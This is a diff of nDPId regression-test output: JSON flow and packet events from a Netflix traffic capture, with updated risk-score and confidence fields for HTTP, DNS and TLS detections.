 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"}
-01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
+01146{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064669,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319064669,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1484319064669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319064669,"pkt":"gCqoTGHM5JjWH70UCABFAABAhwJAAEAGqhTAqAEHNr8RM8\/JAbsptVYdAAAAALAC\/\/+MwgAAAgQFtAEDAwUBAQgKH2Uv3QAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064671,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319064671,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1484319064671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319064671,"pkt":"gCqoTGHM5JjWH70UCABFAABAbOBAAEAGxDbAqAEHNr8RM8\/SAbtTxg2UAAAAALAC\/\/+rMAAAAgQFtAEDAwUBAQgKH2Uv3gAAAAAEAgAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1484319064683,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1484319064683,"pkt":"gCqoTGHM5JjWH70UCABFAABFcJ0AAP8Rx7HAqAEHwKgBAe4iADUAMSObED0BAAABAAAAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAE="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1925,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064683,"flow_last_seen":1484319064683,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1484319064683,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1484319064699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"ts_msec":1484319064699,"pkt":"5JjWH70UgCqoTGHMCABFAADq4UlAAEAR1WDAqAEBwKgBBwA17iIA1plWED2BgAABAAkAAAAAB2ljaG5hZWEDZ2VvB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAMABkHaWNobmFlYQdsYXRlbmN5BnByb2RhYcAYwDUAAQABAAAAFgAENCUk\/MA1AAEAAQAAABYABDQrZhTANQABAAEAAAAWAAQ0Iv+pwDUAAQABAAAAFgAENBhu0sA1AAEAAQAAABYABDQK7rvANQABAAEAAAAWAAQ2RB9SwDUAAQABAAAAFgAENCdXJMA1AAEAAQAAABYABDQobnM="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1930,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319064699,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.geo.netflix.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.37.36.252"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064711,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319064711,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1484319064711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319064711,"pkt":"gCqoTGHM5JjWH70UCABFAABAfOpAAEAGov3AqAEHNCUk\/M\/TAbvE99WSAAAAALAC\/\/9grAAAAgQFtAEDAwUBAQgKH2UwAgAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z9JcNkhzU8YNlaASOJDYrwAAAgQFtAQCCAqtilitH2Uv3gEDAwg="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1484319064722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319064722,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z8mqa43KKbVWHqASOJAmtQAAAgQFtAQCCAqtilitH2Uv3QEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1484319064723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319064723,"pkt":"gCqoTGHM5JjWH70UCABFAAA06mxAAEAGRrbAqAEHNr8RM8\/SAbtTxg2VXDZIdIAQEBUvyAAAAQEICh9lMA6tilit"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1484319064724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319064724,"pkt":"gCqoTGHM5JjWH70UCABFAAA0RtdAAEAG6kvAqAEHNr8RM8\/JAbsptVYeqmuNy4AQEBV9zAAAAQEICh9lMA6tilit"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1942,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064669,"flow_last_seen":1484319064728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319064728,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1943,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064671,"flow_last_seen":1484319064729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319064729,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1484319064781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319064781,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGNcw0JST8wKgBBwG7z9NfgzodxPfVk6ASRersYQAAAgQFtAQCCAqFpSALH2UwAgEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1484319064782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319064782,"pkt":"gCqoTGHM5JjWH70UCABFAAA0MmJAAEAG7ZHAqAEHNCUk\/M\/TAbvE99WTX4M6HoAQEBVQwAAAAQEICh9lMEaFpSAL"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1957,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064711,"flow_last_seen":1484319064785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1484319064785,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1961,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064669,"flow_last_seen":1484319064796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319064796,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064671,"flow_last_seen":1484319064823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319064823,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1964,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319064669,"flow_last_seen":1484319064850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319064850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319064711,"flow_last_seen":1484319064885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1677,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1484319064885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
